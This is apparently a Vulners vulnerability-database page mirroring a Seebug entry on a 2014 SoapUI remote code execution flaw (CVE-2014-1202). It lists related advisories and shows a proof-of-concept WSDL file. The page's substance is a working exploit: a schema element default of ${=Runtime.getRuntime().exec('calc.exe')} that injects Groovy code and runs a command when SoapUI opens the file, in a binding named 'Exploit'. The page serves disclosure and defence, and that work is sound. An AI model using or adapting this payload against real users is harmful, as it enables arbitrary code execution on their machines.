Lucene search
K

SoapUI远程代码执行漏洞

🗓️ 16 Jan 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 36 Views

SoapUI远程代码执行漏洞 in XML WSDL fil

Related
Code
ReporterTitlePublishedViews
Family
0day.today
SoapUI 4.6.3 - Remote Code Execution Vulnerability
14 Jan 201400:00
zdt
Check Point Advisories
SOAPUI Remote Code Execution - Ver2 (CVE-2014-1202)
26 Mar 201500:00
checkpoint_advisories
CVE
CVE-2014-1202
25 Jan 201401:00
cve
Cvelist
CVE-2014-1202
25 Jan 201401:00
cvelist
Exploit DB
SoapUI 4.6.3 - Remote Code Execution
14 Jan 201400:00
exploitdb
exploitpack
SoapUI 4.6.3 - Remote Code Execution
14 Jan 201400:00
exploitpack
Github Security Blog
Code injection via property expansion in SoapUI
17 May 202204:53
github
NVD
CVE-2014-1202
25 Jan 201401:55
nvd
OSV
GHSA-C2FP-MPMM-CQXV Code injection via property expansion in SoapUI
17 May 202204:53
osv
Packet Storm
SoapUI Remote Code Execution
14 Jan 201400:00
packetstorm
Rows per page

                                                <?xml version="1.0"?>
<definitions name="StockQuote"
             targetNamespace="http://example.com/stockquote.wsdl"
             xmlns:tns="http://example.com/stockquote.wsdl"
             xmlns:xsd1="http://example.com/stockquote.xsd"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
             xmlns="http://schemas.xmlsoap.org/wsdl/">
 
  <types>
    <schema targetNamespace="http://example.com/stockquote.xsd"
            xmlns="http://www.w3.org/2000/10/XMLSchema">
      <element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="string">
        <complexType>
          <all>
            <element name="tickerSymbol" type="string"/>
          </all>
        </complexType>
      </element>
      <element name="TradePrice">
         <complexType>
           <all>
             <element name="price" type="float"/>
           </all>
         </complexType>
      </element>
    </schema>
  </types>
 
  <message name="GetLastTradePriceInput">
    <part name="body" element="xsd1:Payload"/>
  </message>
 
  <message name="GetLastTradePriceOutput">
    <part name="body" element="xsd1:TradePrice"/>
  </message>
 
  <portType name="StockQuotePortType">
    <operation name="Malicious_Request">
      <input message="tns:GetLastTradePriceInput"/>
      <output message="tns:GetLastTradePriceOutput"/>
    </operation>
  </portType>
 
  <binding name="Exploit" type="tns:StockQuotePortType">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="Malicious_Request">
      <soap:operation soapAction="http://example.com/GetLastTradePrice"/>
      <input>
        <soap:body use="literal"/>
      </input>
      <output>
        <soap:body use="literal"/>
      </output>
    </operation>
  </binding>
 
  <service name="StockQuoteService">
    <documentation>My first service</documentation>
    <port name="StockQuotePort" binding="tns:StockQuoteSoapBinding">
      <soap:address location="http://example.com/stockquote"/>
    </port>
  </service>
 
</definitions>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jan 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.07673
36